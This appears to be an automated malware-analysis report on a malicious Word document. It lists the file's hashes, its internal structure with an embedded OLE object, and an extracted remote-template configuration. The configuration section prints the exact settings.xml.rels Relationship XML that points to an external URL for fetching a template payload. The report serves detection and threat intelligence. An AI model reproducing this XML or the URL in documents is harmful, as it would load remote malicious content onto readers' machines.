Malicious

828cfd8f73c40445cd3f6587729da514

MS Word Document | MD5: 828cfd8f73c40445cd3f6587729da514 | Size: 293.97 KB | application/msword

Characteristics

Hash | Hash Value
MD5 | 828cfd8f73c40445cd3f6587729da514
Sha1 | b7eb2ade1107c0fdf2f4a933eaa8f865896d0c3a
Sha256 | f934b28bb323edd41edecc32c7f9acc2f24614688758a27f92bd40f63deffc7a
Sha384 | 0bc2eb912a3d566a6fd32106f11cd0c6eb9892a38198cf64c601f1f0d12774c2a98507be1b7e240de22d0e0f148c1af6
Sha512 | 02c0739601694c6efbfac805aa9b5acd0d4904a83ef3ff2acb44bb4de1cf3fd63370edf6daf9fdffa3e6c49a46a56242fa50716068a6d46b0e3f142f67b49413
SSDeep | 6144:vprNVxQ2CjOwmQCveoScrMn1pBbhRWnCkh6xw6h7nlSjY5YqcvT:hrNchCvvBrQhFoi7EIwT
TLSH | D554239E57B814BCCB2B0FBD73C8421DE2D04A8D6567CE4B3A221ADCF31866A4583775

File Structure
[Content_Types].xml
_rels
.rels
word
Malicious
_rels
Malicious
document.xml.rels
footer2.xml.rels
document.xml
footnotes.xml
footer3.xml
footer2.xml
header3.xml
endnotes.xml
embeddings
Malicious
oleObject1.bin
Malicious
Root Entry
Malicious
ObjInfo
Ole10Native
Malicious
[Repaired @0x000000EA]
Malicious
[Content_Types].xml
_rels
.rels
xl
_rels
workbook.xml.rels
workbook.xml
worksheets
sheet4.xml
sheet2.xml
_rels
sheet1.xml.rels
sheet2.xml.rels
sheet3.xml.rels
sheet4.xml.rels
sheet3.xml
sheet1.xml
theme
theme1.xml
styles.xml
sharedStrings.xml
calcChain.xml
printerSettings
printerSettings1.bin
docProps
app.xml
core.xml
[Repaired @0x000012EA]
Malicious
media
image1.emf
theme
theme1.xml
settings.xml
webSettings.xml
fontTable.xml
styles.xml
docProps
app.xml
core.xml

Malware Configuration - Remote Template

Config. Field | Value
Target | https://getabre.com/xnjCQL
Path | settings.xml.rels
XPath | /Relationships/Relationship
Outer XML | <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://getabre.com/xnjCQL" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />

Artefacts

Name | Value | Location
Remote Template - Highly Suspicious | https://getabre.com/xnjCQL (Malicious) | 828cfd8f73c40445cd3f6587729da514 > word > _rels > settings.xml.rels
